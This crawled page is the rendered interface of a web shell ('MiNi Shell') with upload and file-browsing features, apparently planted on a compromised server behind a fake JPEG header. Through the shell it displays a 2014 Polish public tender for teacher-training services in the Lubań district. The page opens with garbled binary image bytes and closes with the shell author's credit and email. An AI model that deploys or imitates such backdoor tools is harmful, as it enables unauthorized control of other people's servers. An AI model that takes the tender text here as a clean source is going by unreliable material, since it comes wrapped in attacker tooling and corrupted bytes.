JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20140729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20140729/163993-N-2014.html

<p class="kh_header"><b>Lubań: USŁUGI SZKOLENIOWE DLA NAUCZYCIELI w ramach projektu Bezpośrednie wsparcie rozwoju szkół i przedszkoli poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w powiecie lubańskim</b><br>
<b>Numer ogłoszenia: 163993 - 2014; data zamieszczenia: 29.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Edukacyjne w Lubaniu , Al. Kombatantów 2, 59-830 Lubań, woj. dolnośląskie, tel. 75 6455340, faks 75 6455340.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pceluban.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: powiatowa jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI SZKOLENIOWE DLA NAUCZYCIELI w ramach projektu Bezpośrednie wsparcie rozwoju szkół i przedszkoli poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w powiecie lubańskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi szkoleniowe dla nauczycieli w ramach projektu Bezpośrednie wsparcie rozwoju szkół i przedszkoli poprzez wdrożenie  zmodernizowanego systemu doskonalenia nauczycieli w powiecie lubańskim współfinansowanego ze środków Europejskiego Funduszu Społecznego i Budżetu Państwa w ramach PO KL działanie 3.5.
Zamówienie obejmuje przeprowadzenie doskonalenia dyrektorów i nauczycieli szkół i przedszkoli oraz przygotowanie materiałów szkoleniowych dla nauczycieli oraz dyrektorów szkół i przedszkoli w ramach projektu poprawy funkcjonowania doskonalenia nauczycieli w powiecie lubańskim poprzez kompleksowe wsparcie 36 szkół i przedszkoli spójne z ich potrzebami.
Doskonalenie polegać ma w szczególności na przeprowadzeniu szkoleń rady pedagogicznej, warsztatów, wykładów, konsultacji grupowych i indywidualnych dla: 490 nauczycieli i dyrektorów szkół, w ramach 17 z 24 ofert doskonalenia określonych przez ORE.
Przedmiotem zamówienia objętych będzie 36 placówek, w tym: 6 przedszkoli, 16 szkół podstawowych, 7 szkól gimnazjalnych, oraz 7 szkół ponadgimnazjalnych.
Wykonawca winien zabezpieczyć kompleksową realizację form doskonalenia nauczycieli (części zamówienia) na najwyższym poziomie merytorycznym w maksymalnie 36 placówkach położonych na terenie powiatu lubańskiego, zgodnie z tematyką:
część 1) Nauczyciel 45+  (2 szkoły, 1 przedszkole)
część 2) Praca z uczniem ze specjalnymi potrzebami edukacyjnymi (4 szkoły)
część 3) Praca z przedszkolakiem ze specjalnymi potrzebami edukacyjnymi (2 przedszkola)
część 4) Wykorzystanie EWD w ewaluacji wewnętrznej szkoły (2 szkoły, 1 przedszkole)
część 5) Techniki uczenia się i metody motywujące do nauki (5 szkół)
część 6) Techniki uczenia się i metody motywujące do nauki (1 przedszkole)
część 7) Budowa koncepcji pracy szkoły (4 szkoły)
część 8) Ocenianie kształtujące (2 szkoły)
część 9) Efektywna organizacja zespołów nauczycielskich (2 szkoły)
część 10) Jak pomóc uczniowi osiągnąć sukces edukacyjny? (1 szkoła)
część 11) Jak pomóc przedszkolakowi osiągnąć sukces edukacyjny? (1 przedszkole)
część 12) Współpraca nauczycieli w prowadzeniu procesów edukacyjnych (1 szkoła)
część 13) Projekt edukacyjny w szkole (1 szkoła)
część 14) Wykorzystanie TiK na zajęciach edukacyjnych - tablica multimedialna (2 szkoły)
część 15) Uczeń aktywny uczestnik procesu uczenia się (1 szkoła)
część 16) Jak i po co prowadzić ewaluację wewnętrzną? (2 szkoły)
część 17) Współpraca szkoły ze środowiskiem lokalnym (1 szkoła)
Zamawiający podzielił przedmiot zamówienia na 17 części i dopuszcza możliwość składania ofert częściowych, zgodnie z wyborem Wykonawcy - na 1, 2 lub wszystkie części.
Łączny czas szkolenia rad pedagogicznych, warsztatów, konsultacji indywidualnych i grupowych wyniesie 1944 godz., w tym dla poszczególnych części:
część 1) Nauczyciel 45+  - 162 godziny
część 2) Praca z uczniem ze specjalnymi potrzebami edukacyjnymi (szkoły) - 216 godzin
część 3) Praca z przedszkolakiem ze specjalnymi potrzebami edukacyjnymi (przedszkola)- 108 godzin
część 4) Wykorzystanie EWD w ewaluacji wewnętrznej szkoły - 162 godziny
część 5) Techniki uczenia się i metody motywujące do nauki (szkoły) - 270 godzin
część 6) Techniki uczenia się i metody motywujące do nauki (przedszkole) - 54 godziny
część 7) Budowa koncepcji pracy szkoły - 216 godzin
część 8) Ocenianie kształtujące - 108 godzin
część 9) Efektywna organizacja zespołów nauczycielskich - 108 godzin
część 10) Jak pomóc uczniowi osiągnąć sukces edukacyjny? (szkoła) - 54 godziny
część 11) Jak pomóc przedszkolakowi osiągnąć sukces edukacyjny? (przedszkole) - 54 godziny
część 12) Współpraca nauczycieli w prowadzeniu procesów edukacyjnych - 54 godziny
część 13) Projekt edukacyjny w szkole - 54 godziny
część 14) Wykorzystanie TiK na zajęciach edukacyjnych - tablica multimedialna - 108 godzin
część 15) Uczeń aktywny uczestnik procesu uczenia się - 54 godziny
część 16) Jak i po co prowadzić ewaluację wewnętrzną? - 108 godzin
część 17) Współpraca szkoły ze środowiskiem lokalnym - 54 godziny.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę: a) oświadczenie o spełnienie warunków udziału w postępowaniu metodą warunku granicznego - spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać, że w okresie ostatnich trzech lat wykonali co najmniej 5 form doskonalenia nauczycieli wraz z podaniem ich przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów, że zostały wykonane należycie. Dowodami są: poświadczenie podmiotu na rzecz którego usługa była wykonywana lub oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.
Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę:
a) wykaz wykonanych głównych usług polegających na doskonaleniu nauczycieli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów czy zostały wykonane należycie, sporządzony przez Wykonawcę samodzielnie lub z wykorzystaniem załącznika do SIWZ,
b) oświadczenie o spełnienie warunków udziału w postępowaniu
metodą warunku granicznego - spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę: a) oświadczenie o spełnienie warunków udziału w postępowaniu metodą warunku granicznego - spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie osobami zdolnymi do wykonania zamówienia (minimum jedną osobą dla każdej części), spełniającymi poniższe wymagania: 

część 1) Nauczyciel 45+
a)	minimum wykształcenie wyższe II stopnia
b)	dziedzina/specjalność zgodna z tematem (specjalista w dziedzinie nauczania programów komputerowych, psycholog, specjalista z zakresu radzenia sobie ze stresem, wypaleniem zawodowym; inne zbliżone)
c)	doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.
 
część 2) Praca z uczniem ze specjalnymi potrzebami edukacyjnymi 
a)	minimum wykształcenie wyższe II stopnia
b)	dziedzina/specjalność zgodna z tematem (psycholog, pedagog specjalny, metodyk)
c)	doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.

część 3) Praca z przedszkolakiem ze specjalnymi potrzebami edukacyjnymi 
a) minimum wykształcenie wyższe II stopnia
b) dziedzina/specjalność zgodna z tematem (psycholog, pedagog specjalny, metodyk)
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce
d) co najmniej 5-letni staż pracy w przedszkolu.

część 4) Wykorzystanie EWD w ewaluacji wewnętrznej szkoły 
a) minimum wykształcenie wyższe II stopnia
     b) dziedzina/specjalność zgodna z tematem (specjalista z doświadczeniem praktycznym w projektowaniu i realizacji ewaluacji z wykorzystaniem analiz opartych na Kalkulatorach EWD)
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.

część 5) Techniki uczenia się i metody motywujące do nauki (szkoły) 
a) min. wykształcenie wyższe II stopnia
b) dziedzina/specjalność zgodna z tematem (metodyk, pedagog, psycholog, w tym specjalista  z zakresu technik uczenia się i zapamiętywania). 
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.

część 6) Techniki uczenia się i metody motywujące do nauki (przedszkole) 
a) min. wykształcenie wyższe II stopnia
b) dziedzina/specjalność zgodna z tematem (metodyk, pedagog, psycholog, w tym specjalista  z zakresu technik uczenia się i zapamiętywania). 
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce
d) co najmniej 5-letni staż pracy w przedszkolu.

część 7) Budowa koncepcji pracy szkoły 
a) minimum wykształcenie wyższe II stopnia
b) dziedzina/specjalność zgodna z tematem (trener, edukator, doradca metodyczny)
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.

część 8) Ocenianie kształtujące 
a)	minimum min. wykształcenie wyższe II stopnia
b)	dziedzina/specjalność zgodna z tematem (specjalista w dziedzinie oceniania kształtującego lub komunikacji interpersonalnej)
c)	doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.

część 9) Efektywna organizacja zespołów nauczycielskich
a) wykształcenie wyższe II stopnia
b) dziedzina/specjalność zgodna z tematem (specjalista w dziedzinie budowania zespołu, trener komunikacji interpersonalnej, socjolog)
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.

część 10) Jak pomóc uczniowi osiągnąć sukces edukacyjny? (szkoła)
a) minimum wykształcenie wyższe II stopnia
b) dziedzina/specjalność zgodna z tematem (pedagog, psycholog, w tym specjalista z zakresu specjalnych potrzeb edukacyjnych oraz dostosowania wymagań edukacyjnych do możliwości psychofizycznych ucznia)
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.

część 11) Jak pomóc przedszkolakowi osiągnąć sukces edukacyjny? (przedszkole) 
a) minimum wykształcenie wyższe II stopnia
b) dziedzina/specjalność zgodna z tematem (pedagog, psycholog, w tym specjalista z zakresu specjalnych potrzeb edukacyjnych oraz dostosowania wymagań edukacyjnych do możliwości psychofizycznych ucznia)
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce
d) co najmniej 5-letni staż pracy w przedszkolu.

część 12) Współpraca nauczycieli w prowadzeniu procesów edukacyjnych
a) wykształcenie wyższe II stopnia
b) dziedzina/specjalność zgodna z tematem (specjalista w dziedzinie rozwoju kompetencji interpersonalnych, pracy z zespołami, metodyk)
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.

część 13) Projekt edukacyjny w szkole 
a) minimum wykształcenie wyższe II stopnia
b) dziedzina/specjalność zgodna z tematem (ekspert/specjalista w dziedzinie nauczania metodą projektów, psycholog, specjalista z zakresu specjalnych potrzeb edukacyjnych oraz dostosowania wymagań edukacyjnych do aktualnych możliwości psychofizycznych ucznia)
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.

część 14) Wykorzystanie TiK na zajęciach edukacyjnych - tablica multimedialna 
a) minimum wykształcenie wyższe II stopnia
b) dziedzina/specjalność zgodna z tematem (specjalista w dziedzinie wykorzystania nowoczesnych technologii w nauczaniu)
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.

część 15) Uczeń aktywny uczestnik procesu uczenia się 
a) minimum wykształcenie wyższe II stopnia
b) dziedzina/specjalność zgodna z tematem (specjalista w dziedzinie organizacji procesów edukacyjnych, specjalista w dziedzinie organizacji przestrzeni sprzyjającej uczeniu się)
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.

część 16) Jak i po co prowadzić ewaluację wewnętrzną? 
               a) wykształcenie wyższe II stopnia
	b) dziedzina/specjalność zgodna z tematem (specjalista w zakresie prowadzenia ewaluacji w oświacie)
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.
	
część 17) Współpraca szkoły ze środowiskiem lokalnym 
a) minimum wykształcenie wyższe II stopnia
b) dziedzina/specjalność zgodna z tematem
c) doświadczenie w realizacji minimum 3 form doskonalenia nauczycieli o zbliżonej tematyce.

Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie w oparciu                      o złożone przez Wykonawcę:
a) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na 
temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia oraz informacją o podstawie do dysponowania tymi osobami sporządzony przez Wykonawcę samodzielnie lub z wykorzystaniem załącznika do SIWZ,
b) oświadczenie o spełnieniu warunków udziału w postępowaniu,
metodą warunku granicznego - spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia w/w warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę: a) oświadczenie o spełnienie warunków udziału w postępowaniu metodą warunku granicznego - spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - wypełniony i podpisany przez wykonawcę.
2. Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.
3. Dokumenty wymagane w przypadku składania oferty wspólnej: 
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
4. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda pisemnego zobowiązania tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - doświadczenie i zasoby kadrowe - 40</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pceluban.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Edukacyjne w Lubaniu , Al. Kombatantów 2, 59-830 Lubań.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2014 godzina 13:00, miejsce: Sekretariat Powiatowego Centrum Edukacyjnego w Lubaniu , Al. Kombatantów 2, 59-830 Lubań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt Bezpośrednie wsparcie rozwoju szkół i przedszkoli poprzez wdrożenie zmodernizowanego systemu doskonalenia nauczycieli w powiecie lubańskim jest współfinansowany ze środków Europejskiego Funduszu Społecznego i Budżetu Państwa w ramach PO KL działanie 3.5.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com